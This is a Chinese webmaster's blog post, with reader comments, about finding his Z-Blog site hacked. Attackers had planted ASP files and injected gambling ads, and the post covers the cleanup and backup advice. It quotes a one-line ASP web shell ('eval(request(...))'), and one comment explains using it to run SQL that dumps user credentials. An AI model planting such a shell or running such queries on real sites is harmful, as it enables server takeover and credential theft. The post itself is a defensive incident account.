关注互联网创业和自媒体赚钱!
站长QQ:791911607

爱小志博客网站被黑及其应对

今天中午12点多用手机访问我的网站还是好好的,等到下午4点多来打开网站的时候,发现网站打开之后,页面错位乱码,原来是网站被黑客攻击了,于是,我立刻用FTP软件登录虚拟主机空间,并且,按照时间顺序排列文件。发现果然不对劲,有人在我虚拟主机空间上传了一个index.asp文件,然后我查看z-blog 2.1原版源码程序,发现并没有index.asp文件,所以,我断定,这个肯定是黑客上传上上去的,于是,我把这个文件立刻删除了,在访问网站的时候,果然能够正常访问了。另外,我看见还有一个文件夹名称为“inc”,其日期是今天最新的日期,我打开进入,发现里面有一个文件名称是coon.asp,但是,我查看原版的z-blog程序,发现并没有一个文件夹是inc,所以,我就果断把这个文件删除了。

下面图片是我网站被攻击之后打开的页面:

image

我们发现,其中有一些乱码的字符,比如“��?”,“br>”等等,之后,我又查看了网页的源代码,发现在代码的底部,挂的全部都是“博彩”和“赌场”的网站广告代码,

image

这个情况,应该说我不是第一次遇见了,但是,网站打开之后是乱码的情况还是第一次出现,以前我有个网站也是挂的什么淘宝商城或者是什么医疗机构,或者是什么博彩网站的广告,但是都是隐藏起来的网站链接和代码,一般我们直接打开网站之后不能直接看见这些链接,所以,我们也通常很难发现这些恶意广告链接,这些隐藏的恶意链接,很容易造成我们网站被百度,谷歌等网站降权,甚至网站被K,所以,我们需要经常查看自己的网站首页源码,最好是下载查看和分析网站日志。

另外,我通过把inc文件夹里面的的conn.asp文件下载到本地,用记事本打开之后,发现里面的代码只有一段,如下图:

image

我们通过在百度搜索这段代码,发现果然有很多网站有被挂上这段代码:

image

而且,很多挂上这个代码的,都是网站的首页标题,不得不说,网站管理员到底干哈去了?

爱小志估计代码中的“qweqwe1”应该是一个人的网络用户名,于是我们在百度搜索qweqwe1:

image

发现用户名称带有“qweqwe1”字符的果然不在少数,光搜索结果就达到了2万多条,这说明,用户名为qweqwe1的黑客真的是很嚣张!

还有,我们搜索“eval request”果然真相浮出了水面:

image

答案是“<% eval(request("#"))%>这句话是一句话小马的服务端,入侵者能利用lake2的客户端进行连接,从而得到一个网站的最高权限,更甚至,拿下这台服务器,注意站点的安全了lz”,黑客已经拿到了网站的服务器控制端。

通过这些分析,我们已经大概知道了网站服务器的问题,所以,爱小志认为,作为站长的我们,需要加强网站的安全的管理,就像这篇文章所说的《关于网赚——我想对大家说的》“黑客可以决定一个网站的生存”,所以,作为站长,尤其是个人站长的我们,需要经常对网站进行备份,备份最好是对整站进行备份,如果可以,每天都需要备份一次数据库,每周备份一次网站所有文件。备份其实很简单,只需用FTP软件登录网站虚拟主机空间,下载mdb数据库即可,其中,z-blog的数据库文件路径为:zb_users\DATA\***.mdb,其中***为您数据库的文件名称。

后记:作为个人站长其实很不容易,树大招风,何况爱小志这棵树还没有“发芽”,几乎就要被黑客扼杀在襁褓之中,究竟是爱小志得罪了各位,还是各位竞争对手网站看不惯爱小志博客呢?

另外,如果您有更好的应对措施,可以在下方给我们留言,谢谢!

赞(0) 打赏
未经允许不得转载:爱小志博客 » 爱小志博客网站被黑及其应对
分享到: 更多 (0)

评论 11

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
  1. #1

    我说下午来你的博客 怎么是这样呢 以为是 主机有啥问题呢 呵呵

    音乐人生网赚6年前 (2013-04-15)回复
  2. #2

    还好及时发现了,要么百度收录猛增,都不知道怎么回事,原来都给别人做宣传了。

    PHP程序员6年前 (2013-04-15)回复
  3. #3

    您知道有啥防黑技巧吗?

    loveseatao6年前 (2013-04-15)回复
  4. #4

    来问候下。

    智慧网赚6年前 (2013-04-15)回复
  5. #5

    很好的经验,以后自己也嫩个多多防范呢

    王攀网赚博客6年前 (2013-04-15)回复
  6. #6

    恩恩,多多积累经验!

    小虾网赚6年前 (2013-04-16)回复
  7. #7

    7年前就玩过一句话木马,到今天了还存在呢。qweqwe1只是发送的一个变量。如果这个变量是一句sql语句,如select * from users那么所有的用户名和密码都会显示出来。

    吵吵6年前 (2013-04-17)回复
  8. #8

    那站点是如何防止呢?

    loveseatao6年前 (2013-04-18)回复
  9. #9

    要不是今天来你的博客看看,我还不知道我的网站被黑了,网站底部出现很多百家乐等广告,我以为是系统临时添加的,结果FXP查看下发现和你的一样,有个文件被修改过,日期在三月底,坑爹啊!!!赶紧删除,再把那个文件上传。接着修改FXP密码空间登录密码,我擦,这事我都能碰见!

    好千度兼职网6年前 (2013-04-19)回复
  10. #10

    以后日子还长着呢!要多多注意!

    loveseatao6年前 (2013-04-19)回复
  11. #11

    具体怎么得到权限有很多方法和漏洞,一时也说不完,我原来玩黑客的时候就是因为想象空间非常大,各种意想不到的技术层出不穷。这个要具体分析的,你要搞更多的资料分析。

    吵吵6年前 (2013-04-19)回复

觉得文章有用就打赏一下文章作者

微信扫一扫打赏